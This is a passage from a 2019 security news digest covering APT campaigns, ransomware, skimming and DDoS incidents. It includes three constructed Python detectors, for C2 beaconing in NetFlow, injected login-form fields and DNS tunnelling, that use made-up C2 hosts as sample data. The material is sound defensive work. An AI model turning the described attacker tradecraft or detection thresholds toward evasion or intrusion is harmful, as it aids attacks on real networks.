Microsoft researchers discovered infrastructure from STRONTIUM (also known as Sednit, APT28, Pawn Storm, and Fancy Bear) attempting to compromise Internet of Things (IoT) devices, including a voice over IP phone, an office printer, and a video decoder, across multiple customer locations. The investigation showed that the threat actor had used these devices to gain initial access to corporate networks. In two of the cases, the devices had been deployed with the manufacturer's default passwords unchanged, and in the third instance the latest security update had not been applied to the device. After gaining access to each of the IoT devices, the actor ran tcpdump to sniff network traffic on local subnets and enumerated administrative groups in an attempt to exploit the network further. As the actor moved from one device to another, they would drop a simple shell script to establish persistence on the network, giving them extended access from which to continue hunting.
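Both the Rocke NetFlow findings above and the STRONTIUM IoT intrusions come down to questions a flow collector can answer: which hosts check in to a known C2 destination on a fixed schedule, and which IoT devices are talking to systems a printer or a desk phone has no business contacting. The following is an added example written for this page, not code from Palo Alto Networks, Microsoft, or any vendor. The flow records, host addresses, the C2 name c2.example, and the device allow-list are all constructed; real NetFlow carries IP addresses rather than names, so in practice the destination would first be matched against resolved C2 indicators.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed NetFlow-style records: (src, dst, dst_port, first_seen_epoch).
# Addresses, names and timestamps are made up for this example; the C2 name
# c2.example stands in for an entry on a C2 indicator list.
T0 = 1_565_000_000
FLOWS = [
    # Host checking in to the C2 name roughly once an hour with small jitter.
    ("10.0.1.5", "c2.example", 80, T0),
    ("10.0.1.5", "c2.example", 80, T0 + 3602),
    ("10.0.1.5", "c2.example", 80, T0 + 7195),
    ("10.0.1.5", "c2.example", 80, T0 + 10803),
    ("10.0.1.5", "c2.example", 80, T0 + 14400),
    # Ordinary workstation: several hits on one CDN, but irregularly spaced.
    ("10.0.1.7", "cdn.example", 443, T0 + 15),
    ("10.0.1.7", "cdn.example", 443, T0 + 900),
    ("10.0.1.7", "cdn.example", 443, T0 + 950),
    ("10.0.1.7", "cdn.example", 443, T0 + 4000),
    ("10.0.1.7", "mail.example", 443, T0 + 30),
    # Office printer: allowed to fetch firmware over HTTPS, nothing else outbound.
    ("10.0.3.20", "fw.vendor.example", 443, T0 + 120),
    ("10.0.3.20", "10.0.1.10", 389, T0 + 5000),   # LDAP to a domain controller
    ("10.0.3.20", "10.0.3.21", 22, T0 + 5100),    # SSH to the VoIP phone next to it
]

# Hypothetical allow-list: destination ports each IoT device may initiate.
IOT_BASELINE = {
    "10.0.3.20": {443},        # printer: firmware/cloud-print only
    "10.0.3.21": {443, 5060},  # VoIP phone: provisioning and SIP
}


def find_beacons(flows, min_hits=4, max_jitter=0.05):
    """Return {(src, dst, port): period_seconds} for connection pairs whose
    inter-arrival times are regular enough to look like a scheduled check-in.
    Jitter is measured as the coefficient of variation of the gaps."""
    by_pair = defaultdict(list)
    for src, dst, port, ts in flows:
        by_pair[(src, dst, port)].append(ts)
    beacons = {}
    for pair, times in by_pair.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        period = mean(gaps)
        if period > 0 and pstdev(gaps) / period <= max_jitter:
            beacons[pair] = round(period)
    return beacons


def iot_policy_violations(flows, baseline):
    """Return flows initiated by a baselined IoT device to a destination port
    outside that device's allow-list (the printer speaking LDAP or SSH)."""
    return [f for f in flows if f[0] in baseline and f[2] not in baseline[f[0]]]


if __name__ == "__main__":
    for pair, period in find_beacons(FLOWS).items():
        print("beacon:", pair, "every", period, "s")
    for src, dst, port, _ in iot_policy_violations(FLOWS, IOT_BASELINE):
        print("policy violation:", src, "->", f"{dst}:{port}")
```

find_beacons keys on regularity rather than volume: a host that reaches one destination four or more times with nearly constant spacing is reported with its period in seconds, which is how the hourly heartbeats in the Rocke data stand out from ordinary browsing that hits the same CDN more often but at random. The allow-list check is deliberately coarse (destination port only); in a real deployment it would also be scoped by destination subnet, and the first LDAP or SSH connection a printer initiates should page someone, because that is exactly the enumeration and lateral movement Microsoft describes.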
Cryptocurrency Theft Rises, Despite Increased Security Measures (08/15/2019)
Cybersecurity research firm CipherTrace found that cryptocurrency theft is on the rise, despite increased security measures by many sites and exchanges. According to the firm's research, "cybercriminals looted $125 million in Bitcoin, Ethereum and other digital assets from exchanges in Q2 2019." The firm pointed to the so-called "exit scam," in which the operators of an exchange or investment scheme disappear with their customers' funds, as the fastest-growing threat, claiming that more than $3.1 billion may have been stolen this way.
WSJ: Huawei Helping Two African National Governments Spy on Political Rivals (08/15/2019)
A new investigation published by The Wall Street Journal claims that engineers from Chinese smartphone and network hardware maker Huawei helped certain African governments spy on their political rivals' communications. Specifically, the article's sources claim the company helped authorities in Uganda intercept encrypted messages and allowed police in Zambia to locate opposition bloggers. Huawei's alleged participation ranged from the provision of Israeli malware to tapping phones and illegally accessing political opponents' Facebook pages. Perhaps surprisingly, both governments readily confirmed that they are working with Huawei, but both framed their efforts as combating "fake news" rather than suppressing communications from sources with views that differ from their own.
Kaspersky Study Examines OT/ICS Incidents (08/21/2019)
Kaspersky Lab has published a new study in which it reported that 52 percent of OT/ICS (operational technology and industrial control system) network incidents were due to "employee errors" or "unintentional actions." The State of Industrial Cybersecurity 2019 report attributed this primarily to the growing complexity of industrial infrastructure, as well as a general shortage of professionals who understand how to detect new threats.
Ransomware Attack Impacts Two Texas Cities (08/22/2019)
The cities of Borger and Keene, Texas became two of the latest municipalities to fall victim to a ransomware attack, Sophos reported. In total, 22 departments within the two local governments were affected by the attack. The attackers reportedly demanded $2.5 million to restore the cities' access to their systems. The state believes a single threat actor was the culprit for the entire incident, and that the attack was routed through a software provider used by all of the affected departments. The impacted cities were still in the process of attempting to recover their systems at the time of writing. No ransom was paid.
Avast Teams Up with Law Enforcement to Halt Retadup Malware (08/28/2019)
Avast worked in conjunction with US and French authorities to neutralize 850,000 infections caused by the Retadup malware, which had been distributing a malicious cryptocurrency miner and other malware to computers running the Windows operating system, mostly in Latin America. While analyzing Retadup, Avast identified a design flaw in its command and control (C&C) protocol that would allow the malware to be removed from victims' computers by anyone who took over the C&C server. Retadup's C&C infrastructure was mostly located in France, so the team worked with French authorities to stop the threat. Some parts of the C&C infrastructure were also located in the United States, so the French authorities involved the FBI. The worm's malicious C&C server has been replaced with a disinfection server that causes the connecting pieces of malware to self-destruct.
Critical Infrastructure Companies Preyed Upon by Hexane Threat Gang (08/28/2019)
A previously unknown threat entity targeted critical infrastructure organizations without being detected for more than 12 months, the security team at Secureworks advised. The threat group, which may have first become active in April 2018, targets organizations in sectors of strategic national importance, including oil and gas and possibly telecommunications. Its activity is similar to other groups, including OilRig and Elfin, but the researchers suspect this is a new entity entirely. This new group has been dubbed "Hexane" (also known as LYCEUM) and typically accesses an organization using account credentials obtained via password spraying or brute-force attacks. Using compromised accounts, the threat actors send spearphishing emails with malicious Excel attachments to deliver the DanBot malware, which subsequently deploys post-intrusion tools.
FTC Reminds Consumers to Be Wary of Romance Scams (08/27/2019)
Consumers should be aware of romance scams that are finding their way into inboxes. The Federal Trade Commission has produced a video and issued an alert to help consumers avoid such scams.
Heatstroke Campaign Implements Multi-Stage Phishing Attack (08/31/2019)
A campaign known as Heatstroke is using a multi-stage phishing attack to siphon private email addresses and eventually payment credentials, the researchers at Trend Micro say. Heatstroke's multistage approach tries to mimic what a legitimate Web site would do to lull the potential victim into thinking nothing is amiss. The phishing kit's content is forwarded from another location, but masked to appear as if it was on the landing page itself. The researchers have learned that the phishing attack chain is dynamic, changing its routines depending upon the user's behavior.
New IRS Scam Spotted in Consumer, Business Inboxes (08/27/2019)
The Internal Revenue Service (IRS) is warning taxpayers and tax professionals about an IRS impersonation scam campaign spreading nationally by email. The email subject line may vary, but examples use the phrase "Automatic Income Tax Reminder" or "Electronic Tax Return Reminder." The IRS reminds consumers that it never sends unsolicited emails and never emails taxpayers about the status of refunds.
Over 80 Ecommerce Sites Compromised in Magecart Skimming Scheme (08/28/2019)
Over 80 Web sites using the Magento ecommerce platform have been compromised to send payment card data via formjacking to servers under the control of the Magecart gang. Research by Arxan Technologies and the Aite Group found that 25% of the compromised sites were motorsports or luxury retail brands. Many of the sites were running older versions of Magento with known vulnerabilities.
Report: US Launched Cyber Attack on Iranian Database Used to Target Oil Tankers (09/01/2019)
A US cyber attack on a database belonging to Iran's Islamic Revolutionary Guard Corps prevented the Iranian paramilitary from launching attacks on oil tankers in the Gulf region, the New York Times (NY Times) has learned. According to unnamed US officials, the June 20 attack knocked systems offline and Iran was still attempting to recover data and reestablish its military communications. The attacked database was used to determine which oil tankers to target.
Satori Botnet Operator Pleads Guilty to Hacking (09/04/2019)
Kenneth Currin Schuchman pled guilty to a hacking charge for operating the Satori botnet, which exploited vulnerabilities across 100,000 Internet of Things (IoT) devices, KrebsOnSecurity reported. Schuchman, a Vancouver, WA resident who used the online monikers "Nexus" and "Nexus-Zeta," built the botnet with at least two other individuals using leaked Mirai botnet source code and used Satori in large-scale distributed denial-of-service attacks between July 2017 and October 2018. The botnet exploited vulnerabilities in routers, digital video recorders, and other IoT devices. Schuchman is facing up to 10 years in prison and fines up to $250,000 USD.
TA505 Adopts New Tactics to Infiltrate New Areas (08/27/2019)
While the TA505 threat actor continues to use either the FlawedAmmyy remote access Trojan or the ServHelper malware as its payload, the group has begun using .ISO image attachments as the point of entry, along with a .NET downloader, a new style of macro delivery, a newer version of ServHelper, and a .DLL variant of the FlawedAmmyy downloader. Trend Micro's research team has also observed TA505 targeting new countries, such as Turkey, Serbia, Romania, Korea, Canada, the Czech Republic, and Hungary.
Twitter CEO's Account Hacked to Send Out Nasty Tweets (08/31/2019)
A hacker took control of the Twitter account of the social media platform's CEO Jack Dorsey, using it to send offensive tweets. Some of the tweets used the hashtag #ChucklingSquad, which is thought to be the name of the hacking group responsible. Once hijacked, the @jack account spewed messages containing racial epithets and a retweet of a message in support of the Nazis, the AFP reported. Twitter said via tweet that Dorsey's account was "compromised due to a security oversight by the mobile provider" and had been secured. The messages were viewable for about a half hour.
US Mobile Users Targeted in Trickbot Campaign (08/31/2019)
The Gold Blackburn threat group is using Web injects from the Trickbot malware to take aim at Verizon Wireless, T-Mobile, and Sprint. When a victim navigates to the Web site of one of these organizations, the legitimate server response is intercepted by Trickbot and proxied through a command and control (C2) server. This C2 server injects additional HTML and JavaScript into the page, which is then rendered in the victim's Web browser. For all three carriers, injected code causes an additional form field that requests the user's PIN code. SecureWorks provided a write-up of this activity.
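One way to catch an inject like the one above is to compare the form the site served with the form the browser actually rendered: the inject has to add its PIN field and its script to the DOM, and those additions are visible to anything that can diff the two. The following is an added example, not SecureWorks code or anything from the carriers; both HTML documents are constructed, and the script origin inject.example is made up. The diff function returns the form inputs and script sources present in the rendered page but absent from the served one.

```python
from html.parser import HTMLParser

# Constructed carrier-style login page as the server sends it.
SERVED_LOGIN = """
<html><body>
<form id="login" action="/login" method="post">
  <input name="username" type="text">
  <input name="password" type="password">
  <input name="remember" type="checkbox">
  <input type="submit" value="Sign in">
</form>
<script src="/static/app.js"></script>
</body></html>
"""

# The same page after a Trickbot-style inject has been applied in the browser:
# an extra PIN field inside the login form and a script from a made-up origin.
RENDERED_LOGIN = """
<html><body>
<form id="login" action="/login" method="post">
  <input name="username" type="text">
  <input name="password" type="password">
  <label>Account PIN</label>
  <input name="pin" type="password" maxlength="6">
  <input name="remember" type="checkbox">
  <input type="submit" value="Sign in">
</form>
<script src="/static/app.js"></script>
<script src="https://inject.example/c.js"></script>
</body></html>
"""


class PageFingerprint(HTMLParser):
    """Collect every (form id, input name, input type) triple and every
    script source on a page; inline scripts are recorded as 'inline'."""

    def __init__(self):
        super().__init__()
        self.form = None
        self.inputs = set()
        self.scripts = set()

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form = a.get("id", "")
        elif tag == "input":
            self.inputs.add((self.form or "", a.get("name", ""), a.get("type", "text")))
        elif tag == "script":
            self.scripts.add(a.get("src") or "inline")

    def handle_endtag(self, tag):
        if tag == "form":
            self.form = None


def fingerprint(html):
    """Parse a page and return (set of input triples, set of script sources)."""
    parser = PageFingerprint()
    parser.feed(html)
    parser.close()
    return parser.inputs, parser.scripts


def injected_content(served_html, rendered_html):
    """Return the form inputs and script sources that exist in the rendered
    page but were never part of the page the server sent."""
    served_inputs, served_scripts = fingerprint(served_html)
    rendered_inputs, rendered_scripts = fingerprint(rendered_html)
    return {
        "inputs": sorted(rendered_inputs - served_inputs),
        "scripts": sorted(rendered_scripts - served_scripts),
    }


if __name__ == "__main__":
    print(injected_content(SERVED_LOGIN, RENDERED_LOGIN))
```

A check of this kind is typically shipped as a page-integrity script or run by a fraud team against an instrumented machine carrying a live infection. Treat the result as evidence, not as a control: the inject runs in the same browser as the check, and an operator who knows the check is there can tamper with it, so the signal belongs in back-end fraud scoring alongside device and behavioural data rather than being trusted on its own.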
Compromised Devices Abused in Campaign to Attack Web Servers (09/09/2019)
Trend Micro detected a spam campaign that uses compromised devices to attack vulnerable Web servers. After brute-forcing devices with weak access credentials, the attackers use them as proxies to forward a base64-encoded PHP script to Web servers. The script sends an email with an embedded link to a scam site to specific email addresses. Some of the samples observed were used for spamming, for redirecting victims to cryptocurrency scams, and for spreading malware to vulnerable servers. The campaign has been seen targeting users in the UK.
Massive DDoS Attack Hits Wikipedia and Lasts for Days (09/11/2019)
Wikipedia was slammed by a massive cyber attack that began on September 6 and lasted nearly three days. Network monitoring company ThousandEyes was observing Wikipedia and recorded a "significant drop in HTTP server availability" worldwide, with site access lost in Europe, the Middle East, and Africa. It is not known how large the attack was, but information from ThousandEyes shows that it was a conventional distributed denial-of-service attack producing massive traffic floods. The Wikimedia Foundation, the nonprofit that operates Wikipedia, condemned the attacks.
Oklahoma Law Enforcement Retirement System Cyber Attack Siphons $4.2 Million (09/09/2019)
A cyber attack targeting the Web site for the Oklahoma Law Enforcement Retirement System (OLERS) resulted in the theft of $4.2 million USD. The crime is being actively investigated by the FBI, but a statement posted to the OLERS site said, "no pension benefits to members or beneficiaries have been impacted or put at risk. All benefits will continue to be paid in a timely fashion as always." OLERS administers retirement and medical benefits to Oklahoma law enforcement.
Ransomware Attacks on the Rise, Take Precautions to Avoid Impacts (09/09/2019)
The Cybersecurity and Infrastructure Security Agency (CISA) has observed an increase in ransomware attacks across the nation. CISA released guidance that describes ransomware, steps to take to prevent such attacks, and ways to recover if an incident does impact systems.
Report: US Grid Hit by March Cyber Attack Following Exploit of Firewall (09/10/2019)
A known vulnerability exploited in a firewall used at an unnamed power utility in the western US resulted in communications outages after an attacker launched a denial-of-service attack at a low-impact control center and multiple remote low-impact generation sites. This information comes from E&E News, which obtained a copy of a Lesson Learned Report from the North American Electric Reliability Corporation (NERC). According to E&E News, the incident occurred on March 5 and impacted California, Wyoming, and Utah. Firewall reboots occurred over a 10-hour period, with each firewall offline for less than five minutes at a time. The report stated, "Given that a firmware update to address the exploited vulnerability had been released prior to the event, the entity's process for assessing and implementing firmware updates was reviewed. Based on this review, the entity decided to implement a more formal and more frequent review of vendor firmware updates that would be tracked within internal compliance tracking software. It should be noted that the entity was already working to develop internal procedures to support this process; however, these were not completed or being practiced at the time of the event."
Thrip Threat Group Continues Targeted Attacks in Southeast Asia with Sophisticated Tools (09/09/2019)
Symantec has linked two threat groups and now believes they are one and the same. Thrip, a Chinese espionage group, is using a previously unseen backdoor known as Hannotog and another backdoor known as Sagerunex. Analysis of Sagerunex shows close links to another long-established espionage group called Billbug (aka Lotus Blossom), and it is likely the two entities are the same. Since June 2018, Thrip has attacked at least 12 organizations within Southeast Asia, including those in the military, maritime communications, education, and media sectors. The Hannotog backdoor has been in use since at least January 2017 and provides the attackers with a persistent presence on the victim's network. Sagerunex gives the attackers remote access.
Trend Micro Investigates What Miscreants Really Talk About in the Dark Underground (09/10/2019)
A post from Trend Micro assesses what information individual cybercrime underground communities discuss in relation to threats and attacks. The Russian underground holds the most discussions on Internet of Things-related attacks while monetization is the main focus of this community. The Portuguese cybercriminal community is the second most active group and many members have discussed KL DNS, a redirection service that allows phishers to capture banking information from infected routers. Individuals in the English-speaking cybercriminal community are most interested in exploiting vulnerabilities, discussing exploit codes, and abusing connected printers.
Facebook Removes Content Associated with Inauthentic Behavior (09/19/2019)
Facebook removed multiple pages, groups, and accounts that were involved in coordinated inauthentic behavior, including two unrelated operations that originated in Iraq and Ukraine. According to the report, six accounts, 120 Facebook Pages, one Group, two Events, and seven Instagram accounts were pulled down for engaging in domestic-focused coordinated inauthentic behavior in Iraq. In regard to Ukraine, Facebook removed 168 accounts, 149 Facebook Pages, and 79 Groups for similar behavior. Facebook said in a statement, "We're taking down these Pages, Groups and accounts based on their behavior, not the content they posted. In each of these cases, the people behind this activity coordinated with one another and used fake accounts to misrepresent themselves..."
Huge DDoS Attack Seen in the Wild Targeting Gaming Company (09/18/2019)
A massive distributed denial-of-service (DDoS) attack hit a company in the gaming industry and peaked at 35 Gbps in bandwidth, Akamai reported. According to the vendor, this is the fourth largest DDoS attack it has ever encountered, and the attack used a UDP amplification technique based on WS-Discovery (Web Services Dynamic Discovery). WS-Discovery is a multicast protocol intended to let consumer and office devices find each other on a local network; devices that also answer it over UDP from the Internet can be abused as reflectors, since the requests are spoofable and the responses are larger than the queries that trigger them.
Panda Threat Entity Uses RATs, Cryptominers in Thievery Activities (09/17/2019)
A threat actor named "Panda" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools and illicit cryptomining malware. Analysis conducted by Cisco shows that Panda uses exploits previously published by the Shadow Brokers, the group that leaked tools from the National Security Agency (NSA), and Mimikatz, an open-source credential-dumping program. Panda began employing new command and control and payload-hosting infrastructure around mid-August.
Teen Gamer Receives 15 Months in Prison for Fatal Swatting Incident (09/16/2019)
An Ohio gamer involved in a swatting incident that led to a death was sentenced to 15 months in prison, the Department of Justice (DOJ) announced. Nineteen-year-old Casey Viner pleaded guilty to one count of conspiracy and one count of obstructing justice. In his plea, Viner admitted he argued with co-defendant Shane Gaskill while playing Call of Duty World War II online. Viner contacted co-defendant Tyler Barriss and asked him to swat Gaskill. Viner, however, gave Barriss an incorrect address. Barriss then called police and reported a hostage situation at the address given to him. Law enforcement responded to the hoax call and shot and killed Andrew Finch, an innocent man. Barriss is serving a 20-year prison term. The incident took place in December 2017.
Tortoiseshell Threat Group Takes Aim at Saudi Supply Chain (09/18/2019)
A previously undocumented attack group dubbed "Tortoiseshell" is using both custom and off-the-shelf malware to target IT providers in Saudi Arabia in what appear to be supply chain attacks with the end goal of compromising the IT providers' customers. Tortoiseshell has been active since at least July 2018. Symantec has identified a total of 11 organizations hit by the group, the majority of which are based in Saudi Arabia. In at least two organizations, evidence suggests that the attackers gained domain admin-level access.
Treasury Department Imposes Sanctions on North Korean Hacking Groups (09/16/2019)
The Treasury Department's Office of Foreign Assets Control announced sanctions targeting three state-sponsored malicious cyber groups responsible for North Korea's malicious cyber activity against critical infrastructure. The department said that the Lazarus Group, Bluenoroff, and Andariel were responsible for cyber attacks on critical infrastructure and financial institutions and for the 2017 WannaCry attack that crippled the National Health Service in the UK. Sigal Mandelker, Treasury Under Secretary for Terrorism and Financial Intelligence, said, "Treasury is taking action against North Korean hacking groups that have been perpetrating cyber attacks to support illicit weapon and missile programs."
Latest Sednit/Fancy Bear/Sofacy Activities Show Sophisticated New Components (09/24/2019)
A Sednit (also known as APT28, Fancy Bear, Sofacy, and STRONTIUM) campaign launched on August 20 to take aim at embassies and ministries of foreign affairs in Eastern European and Central Asian countries, ESET's researchers learned. The campaign, which had previously been described by the security team at Telsy TRT, started with a phishing email containing a malicious attachment that delivered a long chain of downloaders, ending with a backdoor. ESET discovered that Sednit added the Nim language to its toolset for one of its downloaders, updated its Golang downloader, and rewrote its backdoor from Delphi into Golang.
Report: Airbus Targeted by Hackers for Commercial Secrets (09/26/2019)
Threat actors launched cyber attacks on the European aerospace company Airbus through its supply chain, unnamed sources told AFP. There have been four attacks, which began in 2018 and continued into 2019. The sources said that Rolls-Royce, French technology consultancy Expleo, and two French contractors working for Airbus were the targets. Several of the unnamed individuals said that the attackers appeared to be looking for technical documentation related to the certification process for Airbus aircraft components. The hackers also stole documents related to the turboprop engines used in Airbus military planes and details on the propulsion and avionics systems for the Airbus A350 passenger plane. Although it is not clear which threat entity is behind these attacks, the sources pointed to Chinese hackers. Airbus did not respond to the report. Rolls-Royce would not comment on specifics of any attack, and Expleo refused to confirm or deny the events.
Russian Hacker Pleads Guilty in JPMorgan Breach Case Involving 100 Million People (09/24/2019)
Andrei Tyurin, the Russian man responsible for stealing the data of more than 100 million individuals via a massive hacking campaign that hit JPMorgan Chase, has pleaded guilty to six counts, including computer hacking conspiracy and bank fraud, the Department of Justice (DOJ) announced. The scheme took place between 2012 and 2013 and compromised the data of over 100 million financial customers, including 83 million from JPMorgan Chase. Charges against three other individuals involved in this hack are pending.
Scammers Use Voicemail Messages to Trick Corporate Microsoft User Accounts (09/26/2019)
Kaspersky has uncovered a widespread malicious email campaign aimed at stealing Microsoft user account credentials, allowing attackers to access private corporate information. Executed via an elaborate spam message, these attacks target employees of large organizations that use business messengers with a function to exchange voice messages and receive voice message notifications through corporate email. The attack is aimed specifically at corporate mail users and its purpose is to access important business correspondence and confidential commercial data.
Senior Members of Tibetan Groups Attacked by POISON CARP Threat Entity (09/25/2019)
A campaign known as POISON CARP is to blame for attacks on senior members of Tibetan groups. These individuals, as revealed by the Citizen Lab team, received malicious links in individually tailored WhatsApp text exchanges with operators posing as non-governmental organization workers, journalists, and other fake personas. The links led to code designed to exploit Web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages. The attacks took place between November 2018 and May 2019. POISON CARP employed a total of eight Android browser exploits, an Android spyware kit, one iOS exploit chain, and iOS spyware.
Tortoiseshell Threat Actor Victimizes Job-Seeking US Veterans (09/25/2019)
US military veterans are being targeted by the Tortoiseshell threat actor via a fake Web site, Cisco has confirmed. The threat group deployed a Web site purporting to help US military veterans find jobs, and the site closely resembled a legitimate service offered by the Department of Commerce. The site prompted users to download an app, which was actually a malicious downloader that deployed spying tools and other malware, including a remote access Trojan called IvizTech.
Windows Users Exploited by PcShare Backdoor Attacks (09/25/2019)
A suspected Chinese advanced persistent threat group is conducting attacks against technology companies located in Southeast Asia. The threat actors deployed a modified version of the Chinese open-source backdoor called PcShare, which is designed to operate when side-loaded by a legitimate NVIDIA application. According to BlackBerry Cylance, the attackers also deploy a Trojanized screen reader application, replacing the built-in Narrator "Ease of Access" feature in Windows. This backdoor allows them to surreptitiously control systems via remote desktop logon screens without the need for credentials.
xHunt Threat Activity Takes Aim at Kuwaiti Transportation Sector (09/24/2019)
Between May and June, Palo Alto Networks observed previously unknown malicious tools used in the targeting of transportation and shipping organizations based in Kuwait. The activity has been dubbed "xHunt" because the threat actor named the tools after character names from the anime series Hunter x Hunter. These tools use HTTP for their command and control (C2) channels and certain variants use DNS tunneling or emails to communicate with the C2 as well. It is likely that this campaign is related to a similar one documented by IBM in 2018.
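The DNS tunneling variant described above is the kind of C2 channel a resolver log can reveal, because every query has to carry a different encoded payload in the name it looks up. The following Python is an added example, not part of Palo Alto Networks' xHunt analysis: it aggregates per-domain label statistics from query logs and flags domains with many distinct, long or high-entropy subdomains. The log lines, domain names and thresholds are all constructed for illustration, and the registrable-domain split assumes a one-label TLD.

```python
"""Spot DNS-tunnelling command-and-control in resolver query logs by per-domain label statistics."""
import math
from collections import defaultdict

# Constructed resolver log, one query per line as "<timestamp> <client> <qtype> <qname>".
# Ordinary browsing and update traffic plus one domain receiving many distinct, long,
# high-entropy subdomains: the shape of data or tasking encoded into DNS names.
SAMPLE_LOG = """\
2019-06-03T10:15:02Z 10.0.0.21 A www.shipping-portal.example
2019-06-03T10:15:02Z 10.0.0.21 A cdn.shipping-portal.example
2019-06-03T10:15:03Z 10.0.0.21 AAAA mail.shipping-portal.example
2019-06-03T10:15:04Z 10.0.0.21 A www.shipping-portal.example
2019-06-03T10:15:05Z 10.0.0.21 A update.software-vendor.example
2019-06-03T10:15:05Z 10.0.0.21 A download.software-vendor.example
2019-06-03T10:15:06Z 10.0.0.21 TXT 6a3f9c1e0b7d4e2a8f5c.c2-relay.example
2019-06-03T10:15:07Z 10.0.0.21 TXT 9d2b7e4c1f8a0356b7d9.c2-relay.example
2019-06-03T10:15:08Z 10.0.0.21 TXT 0c4e8a2f6b1d3957e0a2.c2-relay.example
2019-06-03T10:15:09Z 10.0.0.21 TXT 5b9d1f3a7c0e2468bd13.c2-relay.example
2019-06-03T10:15:10Z 10.0.0.21 A e2a6c0f4b8d1395720ce.c2-relay.example
2019-06-03T10:15:11Z 10.0.0.21 TXT 7f1b5d9e3a0c2846fb57.c2-relay.example
"""

# Heuristic thresholds (assumed values; tune them against your own resolver baseline).
MIN_UNIQUE_SUBDOMAINS = 5   # a tunnel varies the name on every query to carry new data
MIN_MEAN_ENTROPY = 3.0      # bits per character of the leftmost label
MIN_MEAN_LABEL_LENGTH = 16  # encoded payloads produce long labels


def shannon_entropy(text: str) -> float:
    """Shannon entropy in bits per character; 0.0 for empty or single-symbol text."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    """Naive registrable domain: the last two labels (assumption; a real deployment
    would consult the public suffix list so that e.g. co.uk is handled correctly)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def parse_log(text: str) -> list:
    """Parse the constructed log format into (qtype, qname) tuples, skipping malformed lines."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            records.append((parts[2].upper(), parts[3].rstrip(".").lower()))
    return records


def domain_stats(records: list) -> dict:
    """Aggregate per registered domain: query count, distinct subdomains, mean
    leftmost-label length and entropy, and the share of TXT queries."""
    buckets = defaultdict(
        lambda: {"queries": 0, "subdomains": set(), "lengths": [], "entropies": [], "txt": 0}
    )
    for qtype, qname in records:
        domain = registered_domain(qname)
        sub = qname[: -len(domain)].rstrip(".") if qname != domain else ""
        leftmost = sub.split(".")[0] if sub else ""
        bucket = buckets[domain]
        bucket["queries"] += 1
        bucket["subdomains"].add(sub)
        bucket["lengths"].append(len(leftmost))
        bucket["entropies"].append(shannon_entropy(leftmost))
        bucket["txt"] += qtype == "TXT"
    stats = {}
    for domain, bucket in buckets.items():
        n = bucket["queries"]
        stats[domain] = {
            "queries": n,
            "unique_subdomains": len(bucket["subdomains"]),
            "mean_label_length": sum(bucket["lengths"]) / n,
            "mean_entropy": sum(bucket["entropies"]) / n,
            "txt_ratio": bucket["txt"] / n,
        }
    return stats


def suspicious_domains(stats: dict) -> list:
    """Domains whose subdomain churn combined with label length or entropy looks like tunnelling."""
    flagged = []
    for domain, s in stats.items():
        if s["unique_subdomains"] >= MIN_UNIQUE_SUBDOMAINS and (
            s["mean_entropy"] >= MIN_MEAN_ENTROPY or s["mean_label_length"] >= MIN_MEAN_LABEL_LENGTH
        ):
            flagged.append(domain)
    return sorted(flagged)


if __name__ == "__main__":
    stats = domain_stats(parse_log(SAMPLE_LOG))
    for domain in suspicious_domains(stats):
        s = stats[domain]
        print(f"{domain}: {s['unique_subdomains']} subdomains, mean entropy {s['mean_entropy']:.2f}, "
              f"mean label length {s['mean_label_length']:.1f}, TXT share {s['txt_ratio']:.0%}")
```

Legitimate services that encode data in DNS names (antivirus reputation lookups, some CDNs and telemetry) will trip the same thresholds, so run the check against a baseline period first and allowlist the domains it surfaces before alerting on new ones.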
Google Play Apps Found Harboring Malware to Spy on Egyptian Journalists and Activists (10/03/2019)
Check Point Software studied a targeted attack against journalists and human rights activists in Egypt that Amnesty International had first reported on in March. The Check Point team uncovered previously undisclosed malicious artifacts belonging to this operation. The attackers began developing mobile applications to monitor their targets and hosted them on Google Play. Upon notification, Google removed the malicious apps. The attacks have been ongoing since at least 2018 and many of the victims are political and social activists, high-profile journalists, and members of non-profit organizations in Egypt.
MasterMana Campaign Uses Various Criminal Tactics to Steal Money, Remain Hidden (10/03/2019)
Prevailion has uncovered new details concerning the MasterMana Botnet, which uses business email compromise schemes and backdoors to pilfer cryptocurrency wallets and has been in operation since at least December 2018. This campaign is attributed to the Gorgon Group, a well-known threat group. The operation's phishing emails carried infected document attachments. Opening the infected document initiated the attack's multi-pronged, labyrinth-like kill chain, which evades detection by relying on the trust placed in third-party Web sites and services such as Bitly, Blogspot, and Pastebin. The threat actors also modified older Pastebin posts to cease execution and added features to avoid sandboxing. Ultimately, the victim would download a .NET DLL that performed process hollowing and loaded a fileless backdoor, either a variant of the Azorult malware or the Revenge remote access Trojan.
Attor Platform Spies on Russian Speakers as It Hides Behind Tor (10/10/2019)
A cyber espionage platform dubbed "Attor" by ESET researchers relies on two unusual features to avoid detection and analysis: its GSM (Global System for Mobile Communications) plugin uses the AT command protocol, and it routes its network communications through Tor in highly targeted operations. The platform has existed since at least 2013 and monitors victim activities by screenshotting specific applications. Attor primarily targets Russian speakers and has been seen attacking diplomats, government institutions, and individuals concerned with their privacy.
FIN7 Adds Dangerous New Tools to Threat Arsenal (10/10/2019)
FireEye identified and analyzed two new tools in use by the FIN7 threat group. BOOSTWRITE is an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. One variant of BOOSTWRITE contained the Carbanak and RDFSNIFFER payloads. RDFSNIFFER is the second tool and appears to have been developed to tamper with NCR's Aloha Command Center client, a remote administration toolset designed to manage and troubleshoot systems within payment card processing sectors running the Command Center Agent. RDFSNIFFER contains a backdoor component enabling an attacker to upload, download, execute and/or delete arbitrary files. FireEye notified NCR of the RDFSNIFFER tool.
Magecart Compromises Ecommerce Cloud Platform, Injects Credit Card Skimmers (10/10/2019)
